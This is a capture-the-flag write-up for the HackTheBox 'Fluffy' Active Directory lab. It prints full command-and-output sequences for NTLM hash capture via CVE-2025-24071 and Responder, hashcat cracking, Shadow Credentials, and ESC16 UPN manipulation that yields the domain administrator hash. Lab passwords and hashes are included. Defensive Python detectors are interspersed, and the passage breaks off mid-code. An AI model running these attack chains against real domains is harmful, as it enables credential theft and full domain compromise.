fluffy

1. user

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

1.1. Information gathering

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49677/tcp open  unknown          syn-ack ttl 127
49678/tcp open  unknown          syn-ack ttl 127
49681/tcp open  unknown          syn-ack ttl 127
49698/tcp open  unknown          syn-ack ttl 127
49706/tcp open  unknown          syn-ack ttl 127
49739/tcp open  unknown          syn-ack ttl 127

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# ldapsearch-ad.py -l 10.10.11.69 -t info 
### Server infos ###
[+] Forest functionality level = Windows 2016
[+] Domain functionality level = Windows 2016
[+] Domain controller functionality level = Windows 2016
[+] rootDomainNamingContext = DC=fluffy,DC=htb
[+] defaultNamingContext = DC=fluffy,DC=htb
[+] ldapServiceName = fluffy.htb:dc01$@FLUFFY.HTB
[+] naming_contexts = ['DC=fluffy,DC=htb', 'CN=Configuration,DC=fluffy,DC=htb', 'CN=Schema,CN=Configuration,DC=fluffy,DC=htb', 'DC=DomainDnsZones,DC=fluffy,DC=htb', 'DC=ForestDnsZones,DC=fluffy,DC=htb']

Add the domain and DC names to the hosts file.

1.2. Basic policies

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# ldapsearch-ad.py -l 10.10.11.69 -d fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' -o fluffy.htb_discover_all.log -t all
### Server infos ###
[+] Forest functionality level = Windows 2016
[+] Domain functionality level = Windows 2016
[+] Domain controller functionality level = Windows 2016
[+] rootDomainNamingContext = DC=fluffy,DC=htb
[+] defaultNamingContext = DC=fluffy,DC=htb
[+] ldapServiceName = fluffy.htb:dc01$@FLUFFY.HTB
[+] naming_contexts = ['DC=fluffy,DC=htb', 'CN=Configuration,DC=fluffy,DC=htb', 'CN=Schema,CN=Configuration,DC=fluffy,DC=htb', 'DC=DomainDnsZones,DC=fluffy,DC=htb', 'DC=ForestDnsZones,DC=fluffy,DC=htb']
### Result of "trusts" command ###
### Result of "pass-pols" command ###
[+] Default password policy:
[+] |__ Minimum password length = 7
[+] |__ Password complexity = Disabled
[*] |__ Lockout threshold = Disabled
[*] |__ Password history length = 24
[+] |__ Max password age = 42 days, 0 hours, 0 minutes, 0 seconds
[+] |__ Min password age = 24 hours, 0 minutes, 0 seconds
[+] No fine grained password policy found (high privileges are required).
### Result of "admins" command ###
[+] All members of group "Domain Admins":
[*]     Administrator (DONT_EXPIRE_PASSWORD)
[+] All members of group "Administrators":
[*]     Administrator (DONT_EXPIRE_PASSWORD)
[+] All members of group "Enterprise Admins":
[*]     Administrator (DONT_EXPIRE_PASSWORD)
### Result of "kerberoast" command ###
[*] ca_svc: ADCS/ca.fluffy.htb
[*] ldap_svc: LDAP/ldap.fluffy.htb
[*] winrm_svc: WINRM/winrm.fluffy.htb
### Result of "asreqroast" command ###
### Result of "goldenticket" command ###
[+] krbtgt password changed at 2025-04-17 16:00:02

1.3. bloodhound

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# bloodhound-python -c All -u j.fleischman -p 'J0elTHEM4n1990!' -d fluffy.htb -ns 10.10.11.69 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 27S
INFO: Compressing output into 20250525064207_bloodhound.zip

1.4. smb

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!'  --shares
[*] Initializing SMB protocol database
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share 
┌──(root㉿kali)-[~/…/htb/season8/fluffy/CVE-2025-24071_PoC]
└─# smbclient -U 'j.fleischman%J0elTHEM4n1990!' //10.10.11.69/IT
smb: \> ls

  .                                   D        0  Sun May 25 08:59:17 2025
  ..                                  D        0  Sun May 25 08:59:17 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A      316  Sun May 25 08:54:47 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A      316  Sun May 25 08:55:15 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

The share contains a security notice for the IT department: roughly, the system has the vulnerabilities listed below, and the department is told to remediate and patch them.


1.5. CVE-2025-24071

┌──(root㉿kali)-[~/…/season8/fluffy/CVE-2025-24071_PoC/CVE-2025-24071-msfvenom]
└─# sudo responder -I tun0 -v

# smb: upload exploit.zip to the IT share

# trigger the vulnerability
[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:4612b85423aed...


P.AGILA::FLUFFY:4612b85423aed083:73b5b454a248166fb43f809fa59acdba:010100000000000000796abf52cddb01d23c68ca6ac569020000000002000800550030003100330001001e00570049004e002d00560044005a003600300030005500460046003200590004003400570049004e002d00560044005a00360030003000550046004600320059002e0055003000310033002e004c004f00430041004c000300140055003000310033002e004c004f00430041004c000500140055003000310033002e004c004f00430041004c000700080000796abf52cddb01060004000200000008003000300000000000000001000000002000009850210c3b697422bca38c6b2216e754dbfb52da16aac86c61528cee298fc1640a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310035000000000000000000:prometheusx-303

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: P.AGILA::FLUFFY:4612b85423aed083:73b5b454a248166fb4...000000
Time.Started.....: Sun May 25 14:24:01 2025 (0 secs)
Time.Estimated...: Sun May 25 14:24:01 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 26485.8 kH/s (2.54ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4718592/14344387 (32.90%)
Rejected.........: 0/4718592 (0.00%)
Restore.Point....: 3145728/14344387 (21.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: tomabossu -> pequeñobey
Hardware.Mon.#1..: Temp: 47c Util:  0% Core:1890MHz Mem:7001MHz Bus:8
┌──(root㉿kali)-[~/…/season8/fluffy/CVE-2025-24071_PoC/CVE-2025-24071-msfvenom]
└─# nxc smb 10.10.11.69 -u p.agila -p 'prometheusx-303'
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+]fluffy.htb\p.agila:prometheusx-303 

Three conditions must be met to carry out this attack:

  1. The environment supports PKINIT and the domain controller is at Windows Server 2016 or later.
  2. The domain controller has its own key pair (satisfied as soon as AD CS is enabled or a CA exists).
  3. An account that can edit the victim user's msDS-KeyCredentialLink attribute.

The first two conditions are met here, and the BloodHound analysis shows that
p.agila has GenericWrite over the three SVC accounts, so their msDS-KeyCredentialLink attribute can be modified and condition 3 is met as well.

That means a Shadow Credentials attack can be used to obtain those accounts' hashes.
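Condition 3 is also the defender's hook: the write to msDS-KeyCredentialLink is auditable. The following Python is an added example, not part of the original write-up. It runs over Windows Security Event 5136 ("A directory service object was modified") records, ignores writes by the object itself or by a domain controller, and flags writes by any other principal, with a second finding for the add-then-remove sequence that the `shadow auto` runs above leave behind. The records are constructed (field names follow the real event, values are invented), and the allowlist of expected writers is an assumption to tune per environment. Note that 5136 only fires for the attribute once the user objects carry a SACL auditing Write Property on it.

```python
"""Detect Shadow Credentials activity from Windows Security Event 5136 records.

Added example, not part of the original write-up. Condition 3 above is an
account that can write msDS-KeyCredentialLink on the victim, and that write is
exactly what a defender can audit: Event 5136 fires for it once the user
objects carry a SACL auditing Write Property on the attribute. The records
below are constructed; the field names follow the real event, the values are
invented.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

ATTRIBUTE = "msDS-KeyCredentialLink"

# Principals expected to write the attribute (assumption for this example:
# only domain controllers; add e.g. a directory-sync account if you have one).
EXPECTED_WRITERS = {"DC01$"}

# An add followed by a delete within this window is the add-then-restore
# pattern that tooling such as "certipy shadow auto" leaves behind.
RESTORE_WINDOW = timedelta(minutes=10)


@dataclass(frozen=True)
class Finding:
    subject: str
    target: str
    reason: str


def account_from_dn(dn: str) -> str:
    """CN=winrm_svc,CN=Users,DC=fluffy,DC=htb -> winrm_svc"""
    return dn.split(",", 1)[0].split("=", 1)[1]


def analyse_5136(events: list[dict]) -> list[Finding]:
    """Return findings for third-party writes of msDS-KeyCredentialLink."""
    findings: list[Finding] = []
    pending_adds: dict[tuple[str, str], datetime] = {}
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["EventID"] != 5136 or ev["AttributeLDAPDisplayName"] != ATTRIBUTE:
            continue
        subject = ev["SubjectUserName"]
        target = account_from_dn(ev["ObjectDN"])
        # A machine or user writing its own key credential is normal device
        # registration; so is a domain controller doing it.
        if subject in EXPECTED_WRITERS or subject.rstrip("$").lower() == target.lower():
            continue
        key = (subject, target)
        if ev["OperationType"] == "Value Added":
            pending_adds[key] = ev["TimeCreated"]
            findings.append(Finding(subject, target,
                                    "msDS-KeyCredentialLink written by another principal"))
        elif ev["OperationType"] == "Value Deleted" and key in pending_adds:
            if ev["TimeCreated"] - pending_adds.pop(key) <= RESTORE_WINDOW:
                findings.append(Finding(subject, target,
                                        "key credential added and removed within "
                                        f"{int(RESTORE_WINDOW.total_seconds() // 60)} minutes"))
    return findings


def _event(ts, subject, dn, op):
    # Constructed 5136 record reduced to the fields the check needs.
    return {"EventID": 5136, "TimeCreated": ts, "SubjectUserName": subject,
            "SubjectDomainName": "FLUFFY", "ObjectDN": dn,
            "AttributeLDAPDisplayName": ATTRIBUTE, "OperationType": op}


T0 = datetime(2025, 5, 25, 14, 30, 0)
USERS = "CN=Users,DC=fluffy,DC=htb"
SAMPLE_EVENTS = [
    # normal: the DC writes a key credential on its own computer object
    _event(T0, "DC01$", "CN=DC01,OU=Domain Controllers,DC=fluffy,DC=htb", "Value Added"),
    # suspicious: p.agila adds, then removes, a key credential on winrm_svc
    _event(T0 + timedelta(seconds=20), "p.agila", f"CN=winrm_svc,{USERS}", "Value Added"),
    _event(T0 + timedelta(seconds=25), "p.agila", f"CN=winrm_svc,{USERS}", "Value Deleted"),
    # unrelated attribute change, ignored by the check
    {**_event(T0 + timedelta(minutes=1), "p.agila", f"CN=ca_svc,{USERS}", "Value Added"),
     "AttributeLDAPDisplayName": "description"},
]

if __name__ == "__main__":
    for f in analyse_5136(SAMPLE_EVENTS):
        print(f"{f.subject} -> {f.target}: {f.reason}")
```

The preventive control is the ACL itself: the GenericWrite that BloodHound surfaced above is what to remove, and a periodic listing of who holds write rights on msDS-KeyCredentialLink for privileged and service accounts catches such grants before they are used.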

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad  shadow auto -username 'p.agila@fluffy.htb' -p 'prometheusx-303' -account WINRM_SVC -dc-ip 10.10.11.69

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '43bf6798-ad4a-5adf-82b5-02d1b3e9a7f7'
[*] Adding Key Credential with device ID '43bf6798-ad4a-5adf-82b5-02d1b3e9a7f7' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '43bf6798-ad4a-5adf-82b5-02d1b3e9a7f7' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

With winrm_svc's hash we can log in and grab user.txt.

*Evil-WinRM* PS C:\users\winrm_svc\desktop> type user.txt
a30df7f4961e6d26898035d508f23f44

Grab ca_svc's hash as well; it will be needed later.

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad  shadow auto -username 'p.agila@fluffy.htb' -p 'prometheusx-303' -account CA_SVC -dc-ip 10.10.11.69
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'afcb3015-3d42-459e-3a99-b492233651a2'
[*] Adding Key Credential with device ID 'afcb3015-3d42-459e-3a99-b492233651a2' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'afcb3015-3d42-459e-3a99-b492233651a2' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

(screenshot omitted)
From it, it is clear that the remaining path most likely runs through AD CS.

2. root

The earlier nxc check showed that certificate services are present:

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# nxc ldap 10.10.11.69 -u ca_svc --hash ca0f4f9e9eb8a092addf53bb03fc98c8 -M adcs
LDAP        10.10.11.69     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP        10.10.11.69     389    DC01             [+] fluffy.htb\ca_svc:ca0f4f9e9eb8a092addf53bb03fc98c8
ADCS        10.10.11.69     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.69     389    DC01             Found PKI Enrollment Server: DC01.fluffy.htb
ADCS        10.10.11.69     389    DC01             Found CN: fluffy-DC01-CA

Enumerating with certipy shows that ESC16 is present.

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad find -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -vulnerable  -stdout                             
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
    [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates                   : [!] Could not find any certificate templates
                                                                                        

First check the value of StrongCertificateBindingEnforcement; it determines which method we use to exploit ESC16.

*Evil-WinRM* PS C:\Users\winrm_svc\Documents> Get-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Kdc" -ErrorAction SilentlyContinue


    Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services


Name                           Property
----                           --------
Kdc                            DependOnService                     : {RpcSs, Afd, NTDS}
                               Description                         : @%SystemRoot%\System32\kdcsvc.dll,-2
                               DisplayName                         : @%SystemRoot%\System32\kdcsvc.dll,-1
                               ErrorControl                        : 1
                               Group                               : MS_WindowsRemoteValidation
                               ImagePath                           : C:\Windows\System32\lsass.exe
                               ObjectName                          : LocalSystem
                               Start                               : 2
                               Type                                : 32
                               StrongCertificateBindingEnforcement : 0

The value here is 0, so we use the first method (ESC16 > 2.1. Method 1: combined with UPN manipulation; this requires the domain controller to be in compatibility mode).
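From the defender's side, the same two facts decide whether the CA is in this state and how far the KDC will go along with it. The Python below is an added example, not part of the original write-up or of certipy: it parses the `Disabled Extensions` line from the certipy enumeration above, combines it with the `StrongCertificateBindingEnforcement` value read from the DC, and returns a severity with the remediation. OID 1.3.6.1.4.1.311.25.2 is szOID_NTDS_CA_SECURITY_EXT, the extension that carries the requester's SID and gives the KDC a strong certificate-to-account binding; the registry values follow KB5014754 (0 = disabled, 1 = compatibility mode, 2 = full enforcement). The certipy snippet is the one from this page; the parser's assumption that OIDs sit on a single line separated by spaces or commas is mine.

```python
"""Assess ESC16 exposure from the CA configuration and the KDC registry value.

Added example, not part of the original write-up. Inputs are the two facts the
write-up reads out: the CA's "Disabled Extensions" line from certipy, and
StrongCertificateBindingEnforcement under
HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc on the domain controllers.
OID 1.3.6.1.4.1.311.25.2 is szOID_NTDS_CA_SECURITY_EXT (the SID extension);
registry values per KB5014754: 0 disabled, 1 compatibility, 2 full enforcement.
"""
import re
from dataclasses import dataclass

SECURITY_EXT_OID = "1.3.6.1.4.1.311.25.2"
ENFORCEMENT_MODES = {0: "disabled", 1: "compatibility", 2: "full enforcement"}


@dataclass(frozen=True)
class Assessment:
    security_ext_disabled: bool   # ESC16 condition on the CA
    weak_mapping_accepted: bool   # KDC still maps certificates by UPN/DNS name
    severity: str                 # "high", "medium", "low" or "info"
    actions: tuple[str, ...]


def parse_disabled_extensions(certipy_output: str) -> list[str]:
    """Pull the OIDs from certipy's 'Disabled Extensions : ...' line.

    Assumption: one line, OIDs separated by whitespace or commas.
    """
    m = re.search(r"Disabled Extensions\s*:\s*(.+)", certipy_output)
    if not m:
        return []
    return re.findall(r"\d+(?:\.\d+)+", m.group(1))


def assess_esc16(disabled_extensions: list[str], kdc_enforcement: int) -> Assessment:
    """Combine CA state and KDC enforcement mode into one finding."""
    if kdc_enforcement not in ENFORCEMENT_MODES:
        raise ValueError(f"unexpected StrongCertificateBindingEnforcement value {kdc_enforcement}")
    ext_disabled = SECURITY_EXT_OID in disabled_extensions
    weak_ok = kdc_enforcement < 2
    actions = []
    if ext_disabled:
        actions.append("remove 1.3.6.1.4.1.311.25.2 from the CA's policy\\DisableExtensionList "
                       "registry value and restart CertSvc so new certificates carry the SID")
    if weak_ok:
        actions.append("review KDC event 39 for certificates still relying on weak mappings, "
                       "then set StrongCertificateBindingEnforcement=2 on every DC")
    if ext_disabled and weak_ok:
        severity = "high"    # issued certificates are bound by SAN UPN alone
    elif ext_disabled:
        severity = "medium"  # no SID in certificates, but the KDC refuses weak mappings
    elif weak_ok:
        severity = "low"     # SID is issued, yet the KDC would still accept a weak mapping
    else:
        severity = "info"
    return Assessment(ext_disabled, weak_ok, severity, tuple(actions))


# Excerpt of the certipy "find" output shown on this page.
CERTIPY_SNIPPET = """\
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
"""

if __name__ == "__main__":
    a = assess_esc16(parse_disabled_extensions(CERTIPY_SNIPPET), kdc_enforcement=0)
    print(f"ESC16: {a.security_ext_disabled}, weak mapping accepted: {a.weak_mapping_accepted}, "
          f"severity: {a.severity}")
    for action in a.actions:
        print(" -", action)
```

The registry value is per domain controller, so read it on every DC, not just the one the shell happens to land on; one DC left in compatibility mode is enough for a certificate without the SID extension to be accepted.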

Step 1: Read the victim account's initial UPN (optional, for later restoration).

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad account -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8  -dc-ip 10.10.11.69 -user 'ca_svc' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : administrator
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2025-05-25T18:31:38+00:00

Step 2: Change the victim account's UPN to the target administrator's sAMAccountName.

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad account -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8  -dc-ip 10.10.11.69  -upn 'administrator'  -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'

Step 3: (If necessary) obtain credentials for the "victim" account (for example, via Shadow Credentials).

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# ntpdate 10.10.11.69;certipy-ad shadow -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8  -dc-ip 10.10.11.69 -account 'ca_svc'  auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'bff58174-965a-d510-ca58-0e138d8b2568'
[*] Adding Key Credential with device ID 'bff58174-965a-d510-ca58-0e138d8b2568' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'bff58174-965a-d510-ca58-0e138d8b2568' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
File 'ca_svc.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

Step 4: Request a certificate as the "victim" user from any suitable client-authentication template (for example, "User") on the ESC16-vulnerable CA.

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# export KRB5CCNAME=ca_svc.ccache

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad req -k  -dc-ip 10.10.11.69 -target DC01.fluffy.htb -ca fluffy-DC01-CA -template User
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 18
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Step 5: Restore the "victim" account's UPN.

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad account -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8  -dc-ip 10.10.11.69  -upn 'ca_svc@fluffy'  -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy
[*] Successfully updated 'ca_svc'

Step 6: Authenticate as the target administrator.

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
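The lever in steps 2 and 5 is the userPrincipalName attribute: with the SID extension gone, the KDC maps the certificate to whichever account the SAN UPN names. The Python below is an added example, not part of the original write-up, that audits the attributes `certipy account read` printed above (sAMAccountName, userPrincipalName) across all users and flags a UPN whose prefix names a different account (high when that account is privileged), a UPN with no suffix or with a suffix outside the domain's registered UPN suffixes, and, at low severity, a UPN prefix that merely differs from the sAMAccountName. The user records, the suffix list and the privileged-account list are constructed for the example.

```python
"""Audit userPrincipalName values for the manipulation used in steps 2 and 5.

Added example, not part of the original write-up. Without the SID extension
(ESC16) the KDC binds a certificate to an account by its SAN UPN, so a user's
userPrincipalName being set to another account's name is the thing to catch.
The user records, VALID_SUFFIXES and PRIVILEGED below are constructed.
"""
from dataclasses import dataclass

# Assumptions for this example: the domain's registered UPN suffixes and the
# accounts whose names must never appear in someone else's UPN.
VALID_SUFFIXES = {"fluffy.htb"}
PRIVILEGED = {"administrator"}


@dataclass(frozen=True)
class Finding:
    sam: str
    upn: str
    severity: str
    reason: str


def audit_upns(users: list[dict], valid_suffixes=VALID_SUFFIXES,
               privileged=PRIVILEGED) -> list[Finding]:
    """Check every user's UPN against its own name and the other accounts."""
    by_sam = {u["sAMAccountName"].lower(): u for u in users}
    findings: list[Finding] = []
    for u in users:
        sam = u["sAMAccountName"]
        upn = u.get("userPrincipalName")
        if not upn:
            continue                      # no UPN set: nothing for the KDC to map
        prefix, _, suffix = upn.partition("@")
        if not suffix:
            findings.append(Finding(sam, upn, "medium", "UPN has no domain suffix"))
        elif suffix.lower() not in valid_suffixes:
            findings.append(Finding(sam, upn, "medium",
                                    f"UPN suffix '{suffix}' is not a registered suffix"))
        other = by_sam.get(prefix.lower())
        if other is not None and other is not u:
            sev = "high" if prefix.lower() in privileged else "medium"
            findings.append(Finding(sam, upn, sev,
                                    f"UPN prefix names another account ({other['sAMAccountName']})"))
        elif prefix.lower() != sam.lower():
            findings.append(Finding(sam, upn, "low", "UPN prefix differs from sAMAccountName"))
    return findings


# Constructed user records in the shape "certipy account read" reports them.
SAMPLE_USERS = [
    {"sAMAccountName": "Administrator", "userPrincipalName": "administrator@fluffy.htb"},
    {"sAMAccountName": "p.agila", "userPrincipalName": "p.agila@fluffy.htb"},
    {"sAMAccountName": "winrm_svc", "userPrincipalName": "winrm_svc@fluffy.htb"},
    # the state step 1 above read back: UPN rewritten to the admin's sAMAccountName
    {"sAMAccountName": "ca_svc", "userPrincipalName": "administrator"},
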